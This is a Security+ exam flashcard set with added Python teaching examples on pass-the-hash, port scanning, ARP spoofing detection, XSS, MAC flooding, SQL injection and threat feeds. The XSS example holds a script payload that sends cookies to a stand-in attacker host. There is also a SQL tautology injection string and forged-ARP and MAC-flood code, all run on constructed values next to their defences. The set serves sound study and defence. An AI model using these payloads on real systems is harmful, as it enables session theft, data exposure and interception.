Security+ Prep 1
logic bomb
A ___ is malware that lies dormant until triggered.
botnet
A ____ is a collection of compromised "zombie" computers (bots) controlled from a central command-and-control infrastructure. Botnets are used to send spam, launch distributed denial-of-service attacks, or harvest usernames and passwords used to access sensitive information.
pass-the-hash attack
A ____ is a hacking technique in which an attacker uses the captured NTLM hash of a user's password to authenticate to a server, without ever knowing or using the plaintext password. It works because NTLM challenge-response authentication proves possession of the hash, not the password, so the hash is a password equivalent.
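Added example (not part of the original flashcard set): why a captured NT hash is enough to log in. The NT hash is MD4 over the UTF-16LE password, and an NTLMv2 response is an HMAC-MD5 chain keyed only by that hash, so the legitimate client and an attacker holding just the hash produce byte-identical answers to the server's challenge. MD4 is implemented inline because `hashlib` often lacks it on OpenSSL 3 builds; the user name, domain, server challenge and client blob are constructed values chosen for the demonstration.

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (demonstration only; MD4 is cryptographically broken)."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, k, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4  # target word cycles a, d, c, b
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = rotl((v[t] + fn(x, y, z) + X[order[i]] + k) & mask, shifts[i % 4])
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what is stored and what gets stolen."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nthash: bytes, user: str, domain: str, server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr as in MS-NLMP: HMAC-MD5 keyed by the NT hash, never by the password."""
    ntlmv2_key = hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + client_blob, hashlib.md5).digest()


# Constructed scenario values (hypothetical user, domain, challenge and blob)
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_BLOB = bytes.fromhex("0101000000000000a1b2c3d4e5f60708")


def legit_client_response(password: str, user: str, domain: str) -> bytes:
    """What a real client computes: it hashes the password first, then answers."""
    return ntlmv2_proof(nt_hash(password), user, domain, SERVER_CHALLENGE, CLIENT_BLOB)


def pass_the_hash_response(stolen_hash_hex: str, user: str, domain: str) -> bytes:
    """What an attacker computes with only the dumped hash: the identical answer."""
    return ntlmv2_proof(bytes.fromhex(stolen_hash_hex), user, domain, SERVER_CHALLENGE, CLIENT_BLOB)


def server_accepts(stored_nthash: bytes, user: str, domain: str, proof: bytes) -> bool:
    """Server side: recompute from the stored NT hash and compare in constant time."""
    expected = ntlmv2_proof(stored_nthash, user, domain, SERVER_CHALLENGE, CLIENT_BLOB)
    return hmac.compare_digest(expected, proof)


if __name__ == "__main__":
    h = nt_hash("password").hex()
    print("NT hash of 'password':", h)
    print("hash-only response accepted:", server_accepts(nt_hash("password"), "alice", "CORP",
                                                         pass_the_hash_response(h, "alice", "CORP")))
```

The defence follows from the code: anything that lets an attacker read NT hashes (LSASS memory, the SAM, NTDS.dit) is a credential leak, so protect those stores, prefer Kerberos, and restrict NTLM where possible.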
scope of work
A ____ is a very detailed document that defines exactly what is going to be included in the penetration test. This document is also referred to as the statement of work.
relay attack
A ____ occurs when an attacker can capture NFC data in transit and use the information to masquerade as the original device.
Remote Access Trojan (RAT)
A ____ provides a backdoor that lets an attacker remotely control a computer with administrative privileges. Other types of malware may be delivered alongside a RAT, but they do not by themselves provide remote control.
Trojan Horse
A _____ is a malicious program that is disguised as legitimate software.
SMB
A file that is encrypted on disk (for example with EFS) is automatically decrypted when you copy it over the network using the ___ protocol; unless the transport itself is encrypted (SMB 3 encryption or a VPN), the data travels in the clear.
re-run the vulnerability scan to verify that everything has been fixed and that additional issues are not present.
After fixing an identified vulnerability, you should....
DES and AES
Both ___ and ___ are symmetric (shared-key) block ciphers. DES is weaker than AES: its 56-bit key can be brute-forced, whereas AES uses 128-, 192-, or 256-bit keys.
Availability percentage = uptime / (uptime + downtime) × 100. For example, 8,750 hours up and 10 hours down gives 8,750 / 8,760 = 99.89% availability.
Formula for calculating availability percentages.
Messages from specific senders; email containing threats (such as false links); messages containing specific content.
Gateway email spam filters can be used to block the following:
Impersonation. It is pretending to be somebody else and approaching a target to extract information.
Pretending to have a legitimate reason for approaching someone to ask for sensitive information is called what?
maintaining access
Once a penetration tester has gained access, ___ becomes the next priority. This can be done by installing backdoors, rootkits, or Trojans.
shoulder surfing, eavesdropping, USB and keyloggers, spam and spim, and hoaxes.
Social engineering attacks include ____
trusting nature of individuals
Social engineering relies on the___ to take an action or allow an unauthorized action.
moral obligation, innate human trust, threatening, an easy reward, and ignorance.
Social engineers are master manipulators. Some of the most popular tactics they use are ____
white team
The ____ members are the referees of cybersecurity. This team is responsible for managing the engagement between the red and blue teams. This group typically consists of the managers or team leads.
Input chain
The iptables ____ is where you would place the rule, because that chain is traversed by inbound packets destined for the local host (the OUTPUT chain handles locally generated traffic and the FORWARD chain handles routed traffic).
tracert
The ___ command (traceroute on Linux and macOS) shows the path a packet takes to reach its destination. It is not the best tool to check basic connectivity between two network devices; ping is.
remote server
The best protection is to save log files to a ___ (for example a central syslog or SIEM server). That way, compromise of a system does not give the attacker access to, or the ability to alter, the logs for that system.
Network Layer (3)
The installation and configuration of switches and routers, the implementation of VLANs, penetration testing, and virtualization are implemented at the ____. This refers to the network layer of a layered (defense-in-depth) security model, not the OSI network layer: switches and VLANs operate at OSI Layer 2.
port scanner
Use a ____ to check for open ports on a system or firewall. Compare the list of open ports with the list of ports allowed by your network design and security policy. Typically, a port is open when a service starts or is configured on a device. Open ports for unused services expose the server to attacks directed at that port.
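Added example (not code from the flashcard set): a minimal TCP connect scan followed by the comparison the card describes, open ports versus the ports the network design allows. A throwaway listener on 127.0.0.1 stands in for the host under test, and the allowed-port set is a constructed policy; in practice you would run nmap against the real host and diff its output against the same kind of allow-list.

```python
import socket


def start_listener(host: str = "127.0.0.1"):
    """Open a listening socket on an ephemeral port and return (socket, port).
    Stands in for a service that was started without anyone updating the policy."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def scan_ports(host: str, ports, timeout: float = 0.2) -> list:
    """TCP connect scan: a completed three-way handshake means the port is open.
    connect_ex returns 0 on success, otherwise an errno such as ECONNREFUSED."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def unexpected_open(open_ports, allowed) -> list:
    """Ports that are open but absent from the design/security policy."""
    return sorted(set(open_ports) - set(allowed))


def audit(host: str, ports, allowed, timeout: float = 0.2) -> dict:
    """Scan, then report every open port that the policy does not sanction."""
    found = scan_ports(host, ports, timeout)
    return {"open": found, "violations": unexpected_open(found, allowed)}


if __name__ == "__main__":
    srv, port = start_listener()
    try:
        # Constructed policy: only SSH and HTTPS are supposed to be listening.
        print(audit("127.0.0.1", range(port - 2, port + 3), allowed={22, 443}))
    finally:
        srv.close()
```

A connect scan is noisy (every probe completes a handshake and lands in the target's logs), which is fine for auditing your own hosts; for anything else, make sure the scan is in scope of the engagement first.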
vulnerability scanner
Use a ____ to gather information about systems such as the applications or services running on a system. A ____ often combines functions found in other tools and can perform additional functions, such as identifying open firewall ports, missing patches, and default or blank passwords.
Tarpit
When using a ____, the connection between hosts is kept alive while the application data itself is silently dropped. To both hosts it appears that the other side is receiving the data but not responding. Some malicious applications notice when they are outright blocked (for example by a firewall drop or reset) and change tactics to get around the block; a tarpit keeps the application from realizing it has been blocked and so stops it from circumventing the security control, while tying up the attacker's connections at little cost to the defender.
Active attacks
___ are when perpetrators attempt to compromise or affect the operations of a system in some way. For example, trying to brute-force the root password on a web server is considered an ____. A distributed denial-of-service (DDoS) attack is also an ____.
Password Authentication Protocol (PAP)
___ is considered unsecure because it transmits password information in cleartext. Anyone who sniffs PAP traffic from a network can view the password information from a ___ packet with a simple traffic analyzer.
Wired Equivalent Privacy (WEP)
___ is extremely vulnerable to initialization vector (IV) attacks because it uses a short 24-bit IV that is frequently reused. Once enough frames with repeated IVs have been captured, attackers can recover the key and compromise the encryption.
Reconnaissance
___ is the only phase of a security assessment (penetration test) that can be carried out entirely passively, for example by using open-source intelligence without touching the target's systems.
Enumeration
___ is the second phase in the penetration testing process. The penetration tester uses scanning techniques to extract information such as usernames and computer names.
Group Policy
___ is used to define security policies on a Windows operating system.
Fileless viruses
___ operate only in memory to avoid detection by traditional endpoint security solutions that are focused on matching signatures to files that have been written to the hard drive.
Phishing
___ tricks victims into providing confidential information, such as identity information or logon credentials, through emails or websites that impersonate an online entity that the victim trusts. These entities could include a financial institution or well-known e-commerce site. Phishing is a specific form of social engineering.
ARP spoofing/poisoning
____ associates the attacker's MAC address with the IP address of the victim. Address Resolution Protocol (ARP) poisoning is when an attacker sends fake ARP messages to link their MAC address with the IP address of a legitimate computer or server on the network. Once their MAC address is linked to an authentic IP address, the attacker receives any frames directed to that address. As a result, the attacker can intercept, modify, or block communications intended for the legitimate host (an on-path position). ARP has no authentication, which is why the fake replies are accepted.
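Added example (not from the flashcard set): the ARP reply an attacker sends to claim the gateway's IP is built byte for byte, then the frames are fed through a small detector that records the first MAC seen for each IP and flags any later change, which is the classic arpwatch-style check. Every address here is a constructed value; nothing is sent on a real interface.

```python
import struct

ETH_P_ARP = 0x0806


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header + ARP reply (opcode 2), 42 bytes on the wire."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # htype Ethernet, ptype IPv4, hlen, plen, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return (sender_mac, sender_ip) for an IPv4 ARP reply, None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    if struct.unpack("!HHBBH", frame[14:22]) != (1, 0x0800, 6, 4, 2):
        return None
    return mac_str(frame[22:28]), ip_str(frame[28:32])


class ArpWatch:
    """Remember the MAC first seen for each IP and alert when it changes."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame: bytes) -> None:
        parsed = parse_arp(frame)
        if parsed is None:
            return
        mac, ip = parsed
        known = self.table.setdefault(ip, mac)
        if known != mac:
            self.alerts.append(f"{ip} changed from {known} to {mac}")
            self.table[ip] = mac  # track the new claim so a flip back is also reported


def run_detector(frames) -> list:
    watch = ArpWatch()
    for frame in frames:
        watch.observe(frame)
    return watch.alerts


# Constructed scenario: gateway, victim, and an attacker claiming the gateway's IP
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:00:00:10"
ATTACKER_MAC = "de:ad:be:ef:00:99"

FRAMES = [
    arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # legitimate reply
    arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # poison: attacker as gateway
]

if __name__ == "__main__":
    for alert in run_detector(FRAMES):
        print("ALERT:", alert)
```

Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, stop the poison from taking effect; the detector above only tells you it happened.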
Instant messaging applications
____ can be a vehicle for malware and virus delivery as well as social engineering exploits.
Cyber terrorists
____ generally use the internet to carry out terrorist activities, such as disrupting network-dependent institutions.
Active RFID tags
____ have onboard batteries and can send signals over a long distance. Road toll passes and other types of passes use active RFID.
Spim
____ is a malicious link sent to the target over instant messaging. Spim is a type of spam that targets users of instant messaging services. Creating a whitelist or using an IM blocker are countermeasures that can be implemented against spim.
Vishing
____ is a social engineering attack that uses voice over IP (VoIP) to gain sensitive information. The term is a combination of voice and phishing.
Real-time communication
____ is a strength of instant messaging clients.
Cross-site scripting (XSS)
____ is an attack that injects scripts into web pages. When a user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions. Some scripts redirect users to legitimate websites but run in the background to capture information sent to the legitimate site. Scripts can be written to read (steal) cookies that contain identity information (such as session information). Scripts can also be designed to run under the security context of the current user. For example, scripts might execute with full privileges on the local system, or the scripts might run using the credentials used on a financial website. The primary defense is output encoding appropriate to the context (HTML body, attribute, JavaScript, URL), backed by a Content Security Policy.
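Added example (not from the flashcard set): the same profile page rendered two ways. The vulnerable version drops user input straight into the HTML body, an attribute and a link; the fixed version encodes for each context with `html.escape` and allow-lists the link scheme, because escaping alone does nothing against a `javascript:` URL. The payloads and the template are constructed for the demonstration.

```python
import html
from urllib.parse import urlparse

# Constructed payloads: one targets the HTML body, the other a quoted attribute
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_vulnerable(name: str, link: str) -> str:
    """User input interpolated raw into body text, an attribute and a URL."""
    return f'<p title="{name}">Hello {name}</p><a href="{link}">profile</a>'


def safe_href(link: str) -> str:
    """Allow same-origin relative paths and http(s) only; neuter everything else."""
    if link.startswith("/") and not link.startswith("//"):
        return link
    return link if urlparse(link).scheme.lower() in ("http", "https") else "#"


def render_safe(name: str, link: str) -> str:
    """Same page with context-appropriate encoding (html.escape encodes & < > \" ')."""
    return (f'<p title="{html.escape(name)}">Hello {html.escape(name)}</p>'
            f'<a href="{html.escape(safe_href(link))}">profile</a>')


def contains_live_script(page: str) -> bool:
    """True if an unencoded <script> tag survived into the page."""
    return "<script>" in page.lower()


def attribute_breakout(page: str) -> bool:
    """Crude check for an injected event-handler attribute."""
    return ' onmouseover="' in page


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD, "javascript:alert(1)"))
    print(render_safe(SCRIPT_PAYLOAD, "javascript:alert(1)"))
```

Real templating engines (Jinja2 with autoescape, for instance) do the body and attribute encoding for you, but the URL-scheme check still has to be yours.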
Open-source intelligence
____ is any data that is collected from publicly available sources. The goal is to gather as much information as possible on the target, including personally identifiable information (PII), without touching the target's systems.
War Driving
____ is the act of searching for wireless networks (802.11) using a signal detector or a network client (such as a PDA or notebook). While the phrase war driving originated from the action of driving around a city searching for wireless networks, the name currently applies to any method of searching for wireless networks, including walking around.
Reconnaissance
____ is the first phase in the penetration testing process. This is when the penetration tester begins gathering information.
Gain access
____ is the third phase of the penetration test life cycle and uses the information gathered in earlier phases to exploit discovered vulnerabilities.
Bluesnarfing
____ is the use of a Bluetooth connection to gain unauthorized access to data on a Bluetooth-enabled device such as a phone, desktop, laptop, or PDA. Bluesnarfing allows an attacker to view the calendar, emails, text messages, and contact lists. Many Bluetooth devices have built-in protections (non-discoverable mode, mandatory pairing), but it remains a known vulnerability on older or misconfigured devices.
Preloading
____ is used to set up a target by influencing the target's thoughts, opinions, and emotions.
Dumpster diving
____ is when an attacker goes through the trash to find important information that may have accidentally been thrown away. Because there is no direct interaction with the target, dumpster diving is a form of passive reconnaissance.
Passive attacks
____ occur when perpetrators attempt to gather information without affecting the flow of that information on the network. Packet sniffing and port scanning are ___. Note that a port scan still sends probe packets to the target and is detectable in its logs, so many references classify it as active reconnaissance.
DNS poisoning
____ occurs when a name server receives malicious or misleading data that incorrectly maps host names and IP addresses. In a DNS poisoning attack: (1) incorrect DNS data is introduced into a primary DNS server; (2) the incorrect mapping is made available to client applications through the resolver; (3) traffic is directed to incorrect sites.
MAC flooding
____ overloads the switch's MAC forwarding (CAM) table to make the switch behave like a hub. The attacker floods the switch with frames, each carrying a different source MAC address. The flood fills up the forwarding table and exhausts the memory reserved for it, so the switch enters a state called fail-open mode. While in this mode, frames for destinations the switch can no longer learn are flooded out of all ports (as with a hub), instead of just the correct port, and the attacker can sniff them.
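Added example (not from the flashcard set): a toy switch with a fixed-size CAM table, so the fail-open behaviour can be watched step by step. Frames to a learned destination go out one port; frames to an unknown destination are flooded to every other port. Once bogus source MACs have filled the table, a real host whose entry ages out can no longer be relearned, and traffic for it is flooded to the attacker's port. Capacities, ports and MAC addresses are constructed.

```python
import os


class ToySwitch:
    """Minimal learning switch with a bounded MAC (CAM) table."""

    def __init__(self, ports, capacity: int):
        self.ports = list(ports)
        self.capacity = capacity
        self.cam = {}  # mac -> port

    def learn(self, mac: str, port: int) -> None:
        # Known MACs are refreshed; new ones are learned only while there is room.
        if mac in self.cam or len(self.cam) < self.capacity:
            self.cam[mac] = port

    def age_out(self, mac: str) -> None:
        """Simulate the normal expiry of a CAM entry."""
        self.cam.pop(mac, None)

    def forward(self, src: str, dst: str, in_port: int) -> list:
        """Return the egress port(s) for a frame."""
        self.learn(src, in_port)
        if dst in self.cam:
            return [self.cam[dst]]
        return [p for p in self.ports if p != in_port]  # unknown unicast: flood


def random_mac() -> str:
    return ":".join(f"{b:02x}" for b in os.urandom(6))


def mac_flood(switch: ToySwitch, attacker_port: int, count: int) -> None:
    """What macof does: frames with random source MACs from one port."""
    for _ in range(count):
        switch.forward(random_mac(), random_mac(), attacker_port)


def demo():
    sw = ToySwitch(ports=[1, 2, 3], capacity=64)
    server, client, attacker_port = "00:00:00:00:00:01", "00:00:00:00:00:02", 3
    sw.forward(server, client, 1)
    sw.forward(client, server, 2)
    before = sw.forward(client, server, 2)  # normal: unicast to port 1 only
    mac_flood(sw, attacker_port, 1000)      # attacker fills the CAM table
    sw.age_out(server)                      # server's entry expires as it normally would
    mac_flood(sw, attacker_port, 10)        # attacker keeps flooding, so the freed slot is taken
    sw.forward(server, client, 1)           # server talks, but cannot be relearned
    after = sw.forward(client, server, 2)   # client->server is now flooded; port 3 sees it
    return before, after


if __name__ == "__main__":
    print("before flood:", demo()[0], " after flood:", demo()[1])
```

Port security (a cap on MACs learned per port, with shutdown or restrict on violation) is the standard mitigation on managed switches.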
Peer-to-peer (P2P)
____ software allows users to share content and access content shared by other users without using centralized servers or centralized access control.
Security Orchestration, Automation, and Response (SOAR)
____ systems gather and analyze data like SIEM systems, but they take the analysis to the next level. ____is a solution stack of compatible software programs that allow an organization to collect data about security threats from multiple sources and respond to low-level security events without human assistance.
Distributing hoax virus-information emails
_____ are a social engineering attack. This type of attack preys on email recipients who are fearful and will believe most information if it is presented in a professional manner. The victims of these attacks fail to double-check the information or instructions with a reputable third-party antivirus software vendor before implementing the recommendations. Usually, these hoax messages instruct the reader to delete key system files or download Trojans.
SQL Injection Attack
_____ is an attack that infiltrates a web application by manipulating the SQL statements built from input entered into a web page. It is important to note that SQL injections are the result of flaws in the web application (building queries from untrusted input), not in the database, file system, or web server. Parameterized queries (prepared statements) and server-side input validation prevent it.
Client-side validation
_____ should have been used on the local system to identify input errors in the order form before the data was ever sent to the server. In this example, if the user entered SQL commands in an order form field, the error would have been detected and blocked before the form was submitted. Note that client-side checks improve usability only; an attacker can bypass them with any HTTP client, so the server must validate the input again and use parameterized queries.
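Added example (not from the flashcard set) covering the two cards above: an order lookup built by string concatenation beside the parameterized version, run against an in-memory SQLite database, plus the server-side allow-list check that has to exist regardless of what the browser validated. The table contents and the injection string are constructed.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed orders table with three customers."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (id INTEGER, customer TEXT, total REAL)")
    db.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                   [(1, "alice", 10.0), (2, "bob", 20.0), (3, "carol", 30.0)])
    return db


def lookup_vulnerable(db: sqlite3.Connection, customer: str) -> list:
    """Query text assembled from user input: the input becomes part of the SQL."""
    sql = "SELECT id, customer FROM orders WHERE customer = '" + customer + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, customer: str) -> list:
    """Parameterized query: the driver sends the value separately, never as SQL."""
    return db.execute("SELECT id, customer FROM orders WHERE customer = ?", (customer,)).fetchall()


# Allow-list for what an order-form customer field may legitimately contain
CUSTOMER_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def validate_server_side(customer: str) -> bool:
    """Repeat the form check on the server; the client-side copy cannot be trusted."""
    return bool(CUSTOMER_RE.match(customer))


# Classic tautology payload: closes the string, ORs in an always-true clause
INJECTION = "nobody' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, INJECTION))  # every row
    print("safe:      ", lookup_safe(db, INJECTION))        # no customer has that name
    print("validated: ", validate_server_side(INJECTION))   # False, rejected before any query
```

With the parameterized form the payload is simply a (nonexistent) customer name; validation on top of that limits what reaches the database at all.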
Pharming
____ redirects a victim's URL traffic to the attacker's malicious website, either by running a malicious program on the target's computer (for example, altering the local hosts file) or by poisoning DNS, so the victim lands on the fake site even after typing the correct address.
Pretexting
____is conducting research and information gathering to create convincing identities, stories, and scenarios to be used on selected targets.
MD5
____ is the weakest of the common hashing algorithms. It produces a 128-bit message digest, and practical collision attacks against it have existed since 2004. A larger digest gives more room for security, but it is not sufficient on its own: SHA-1, with its 160-bit digest, is stronger than MD5 yet also has a demonstrated collision (2017) and should not be used for signatures or integrity checks. Use SHA-256 or better.
Threat feeds
____ provide real-time updates on cyberthreats across the world. They can supply indicators such as suspicious domains, known malware hashes, known malicious IP addresses and ranges, and more, which can be matched against your own logs.
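Added example (not from the flashcard set): what consuming a threat feed looks like in practice, matching outbound proxy log lines against a feed of malicious IPs, CIDR ranges and domains. Both the feed entries and the squid-style log lines are constructed, not real indicators, and the log format is a simplified one assumed for the demonstration.

```python
import ipaddress
import re

# Constructed feed (hypothetical indicators, documentation address ranges)
FEED = {
    "ips": ["203.0.113.7"],
    "cidrs": ["198.51.100.0/24"],
    "domains": ["malware.example", "c2.bad.example"],
}

# Constructed log lines: timestamp client action dst_host dst_ip
LOG_LINES = [
    "1700000000.000 10.0.0.5 TCP_TUNNEL update.example 93.184.216.34",
    "1700000001.000 10.0.0.9 TCP_TUNNEL files.c2.bad.example 198.51.100.23",
    "1700000002.000 10.0.0.5 TCP_MISS cdn.example 203.0.113.7",
    "1700000003.000 10.0.0.11 TCP_MISS intranet.example 10.0.0.2",
]


class ThreatFeed:
    """Indicator set with exact-IP, CIDR and domain (including subdomain) matching."""

    def __init__(self, feed: dict):
        self.ips = {ipaddress.ip_address(i) for i in feed["ips"]}
        self.nets = [ipaddress.ip_network(c) for c in feed["cidrs"]]
        self.domains = [d.lower() for d in feed["domains"]]

    def match_ip(self, ip: str):
        addr = ipaddress.ip_address(ip)
        if addr in self.ips:
            return f"ip:{ip}"
        for net in self.nets:
            if addr in net:
                return f"cidr:{net}"
        return None

    def match_domain(self, host: str):
        host = host.lower().rstrip(".")
        for d in self.domains:
            if host == d or host.endswith("." + d):  # subdomains of a bad domain count
                return f"domain:{d}"
        return None


LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")


def scan_logs(feed: ThreatFeed, lines) -> list:
    """Return one hit per log line whose destination host or IP is in the feed."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; real code would count these
        _ts, client, _action, host, dst_ip = m.groups()
        ioc = feed.match_domain(host) or feed.match_ip(dst_ip)
        if ioc:
            hits.append({"client": client, "host": host, "dst_ip": dst_ip, "ioc": ioc})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(ThreatFeed(FEED), LOG_LINES):
        print(hit)
```

Domain matching on the subdomain suffix is deliberate: attackers rotate hostnames under a bad apex far more often than they change the apex itself.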
nmap
____ scans networks to discover live hosts and open ports, and with options such as -sV and -O it can also identify service versions and operating systems.
netstat -a
____ shows all sockets on the local host, both listening and non-listening (for example established connections).